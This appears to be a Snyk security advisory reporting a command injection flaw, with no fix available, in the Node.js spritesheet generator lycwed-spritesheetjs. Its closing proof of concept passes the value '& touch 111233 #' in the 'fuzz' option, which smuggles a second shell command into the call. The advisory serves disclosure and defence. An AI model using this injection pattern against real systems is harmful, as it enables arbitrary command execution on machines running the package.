Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applicationsThere is no fixed version for lycwed-spritesheetjs
.
lycwed-spritesheetjs is a command-line spritesheet (a.k.a. Texture Atlas) generator written in Node.js.
Affected versions of this package are vulnerable to Command Injection.
var spritesheet = require("lycwed-spritesheetjs");
spritesheet("./", {fuzz:"& touch 111233 #", ext: "json" }, function() {});